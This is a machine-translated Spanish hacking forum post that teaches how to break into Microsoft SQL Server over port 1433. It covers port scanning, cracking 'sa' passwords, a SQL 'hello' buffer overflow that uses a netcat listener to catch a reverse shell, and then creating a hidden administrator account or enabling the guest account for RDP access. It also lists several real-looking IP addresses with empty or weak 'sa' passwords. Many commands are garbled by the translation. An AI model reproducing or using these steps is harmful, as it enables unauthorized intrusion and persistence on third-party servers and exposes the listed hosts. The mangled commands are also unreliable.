Todos los puertos legendarios de SF Express están abiertos excepto el 135.137.139. ¿Cómo ingresar 1433? urgente
La intrusión en puertos es difícil de detectar, pero también hay administradores de red descuidados.
Scanport.exe tiene 1433 máquinas.
SQLScanPass.exe destruyó el diccionario (el diccionario es la clave)
Finalmente, SQLTools.exe invadió
Para sistemas con SQL sp2 o inferior, puede utilizar La vulnerabilidad de desbordamiento de saludo de SQL se utiliza para intrusiones.
Nc -vv -l -p puerto local sqhelelloF.exe invade ip 1433 puerto local ip local.
(Lo anterior se invierte, la prueba es exitosa)
Sqhelelloz.exe invade la ip 1433 (esta es una conexión directa).
La herramienta de desbordamiento perdida hace mucho tiempo
Los resultados del escaneo del servidor usando X-Scan en este sitio aparecieron. Hay muchos puertos abiertos: 53, 80, 1433, 3389. Pero no hubo informes de contraseñas débiles, por lo que parece que el administrador de la red es más responsable. Pero abrir el puerto 3389 significa que puede iniciar sesión de forma remota. Este es el "caballo de Troya" más grande que Microsoft presenta a todos los usuarios de Windows.
A través de la observación, descubrí que solo trabajar en el puerto 1433 marcaba la diferencia. ¿Por qué no probar la herramienta de desbordamiento de SQL2?
Primero, abra una ventana cmd para proporcionar netcat y escriba "netcat -l -p 99" en el símbolo del sistema para escuchar el puerto local 99. Luego es el turno de SQL2. Abra otra ventana de cmd y escriba "SQL 2 218.147.*.* 61.157.* * 0" donde está 218.147. *.* es la IP opuesta, 665438. Volvamos atrás y observemos la escucha de netcat en el puerto local. Se convierte en C:\WinNT\system32\_, que es la carpeta del sistema de la máquina de la otra parte. Parece que el desbordamiento fue exitoso, así de simple.
Tuve la suerte de obtener un caparazón de la otra parte, lo cual también fue permitido por el administrador. Lo que sucede después es familiar. Agregue un usuario y aumente los permisos: ingrese "net user hacker 12345 /add" cuando se le solicite (cree un usuario llamado hacker en la máquina de la otra parte con una contraseña de 12345), luego ingrese "net local group administrador hacker /add" (cambie El usuario hacker se agrega al grupo de administradores).
Primero, use Windows XP para ejecutar el dispositivo de inicio de sesión remoto mstsc.exe y complete la dirección IP de la otra parte 218.147. * * Después de la confirmación, completé la interfaz de inicio de sesión con mi nuevo nombre de usuario y contraseña 12345, y entré exitosamente al escritorio de Windows 2000 de la otra parte.
218.5.135.66 Contraseña débil del servidor SQL: "sa/1234"
218.14.115.11 Contraseña débil del servidor SQL: "sa/[contraseña vacía]"
218.12. 38. 52 Contraseña débil de SQL-Server: "sa/[contraseña vacía]"
218.12. 14 Contraseña débil de SQL-Server: "sa/[contraseña vacía]"< /p >
218.6.242.228 Contraseña débil de SQL-Server: "sa/[contraseña vacía]"
222.100.119.3 Contraseña débil de SQL-Server: "sa/[contraseña vacía]"
222.105.67.200 Contraseña débil del servidor SQL: "sa/[contraseña vacía]"
222.105. 130 Contraseña débil del servidor SQL: "sa/[contraseña vacía]"
222.106 60 . 51 Contraseña débil del servidor SQL: "sa/[contraseña vacía]"
222.117.107.1 Contraseña débil del servidor SQL: "sa/[contraseña vacía]"
Si mssql está instalado en una máquina win2000, la máquina abrirá el puerto 1433. ¿Qué? ¿Qué es un puerto? Al igual que en el escaparate de compras del comedor, se compra repollo en el escaparate 1 y tomates en el escaparate 2. Compre mssql en la máquina y vaya al puerto 1433. Overflow 1433 requiere dos herramientas: nc.exe y sql2.exe. El método de ataque consta de dos pasos: abra una ventana cmd en su propia máquina. Por cierto, si desea utilizar win2000, simplemente inicie y ejecute, escriba cmd, presione Entrar y estará listo. Aquí solo usamos 2000 en lugar de 98. Si coloca el siguiente y sql2.exe funciona en la unidad c, simplemente ingrese el comando C: > NC-1-P 40 en la ventana que se abre y luego presione la tecla Enter. Este paso significa usar herramientas NC para abrir un monitor de puerto de 40 años. Paso 2: escriba cmddust en Inicio-Ejecutar y abra una nueva ventana. Escriba el comando c:>sql2.exe en esta ventana. Si desea invadir la IP del sitio web, ingrese su propia IP 40 0. Aquí una pequeña explicación: ¿Cómo obtener la IP del sitio web intruso? En cmd, c: > haga ping a la URL. No necesito decirte mi propia IP, ¿verdad? Simplemente sigue adelante y sueña. Simplemente ingrese ipconfig en cmd. Puedes cambiar 40 en la línea de comando por otra cosa a voluntad, pero parece que 40 y 53 tienen una mayor tasa de éxito. Si no está seguro del 0 en el comando, puede probar con 1 o 2. Si el sitio web pirateado tiene esta vulnerabilidad, la primera ventana que abra se convertirá en un broiler C:>winnt\system32>. Es decir, ingresas a su máquina. Puedes agregar un stand después de entrar. Usuario de red invitado /activo:yes Con este comando, los invitados que están deshabilitados por defecto se habilitarán y encenderán. Usuario de red invitado 123456, por lo que la contraseña del invitado pasa a ser 123456. Invitado/agregar del administrador del grupo local de red Aquí es donde el invitado se convierte en el administrador con los privilegios más altos.
Jaja, eso es básicamente todo. . .